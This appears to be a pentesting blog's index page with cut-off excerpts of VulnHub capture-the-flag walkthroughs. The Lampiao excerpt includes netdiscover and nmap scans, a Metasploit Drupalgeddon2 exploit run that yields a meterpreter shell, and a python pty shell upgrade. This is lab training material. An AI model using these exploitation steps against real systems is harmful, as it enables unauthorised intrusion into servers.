Pentesting * VULNHUB

K2 VM (VULNHUB)

VM LINK : https://download.vulnhub.com/devrandom/K2.ova root@kali:~# netdiscover -i eth0 Currently scanning: 192.168.69.0/16 | Screen View: Unique Hosts 15 Captured ARP Req/Rep packets, from 5 hosts. Total size: 900 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname —————————————————————————– 192.168.23.2 00:50:56:f6:84:83 2 120 VMware, Inc. 192.168.23.1 00:50:56:c0:00:08 1 60 VMware, Inc. 192.168.23.140 00:0c:29:7e:f6:12 10 600 […]

VULNHUB

AI WEB (VULNHUB)

root@kali:~/Downloads# nmap -A 192.168.65.158 Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-31 17:25 GMT WARNING: RST from 192.168.65.158 port 80 — is this port really open? WARNING: RST from 192.168.65.158 port 80 — is this port really open? WARNING: RST from 192.168.65.158 port 80 — is this port really open? WARNING: RST from 192.168.65.158 port […]

VULNHUB

Lampiao_1 (VULNHUB)

VM LINK : https://download.vulnhub.com/lampiao/Lampiao.zip root@kali:~# nmap -p- -A 192.168.1.105 port : 22 , 80 , 1898 now on browser http://192.168.1.103:1898 now on terminal msf > user explot/unix/webapp/drupal_drupalgeddon2 msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.105 msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898 msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit meterpreter > shell python -c ‘import pty;pty.spawn(“/bin/bash”)’ www-data@lampiao:$ lsb_release -a www-data@lampiao:$ now […]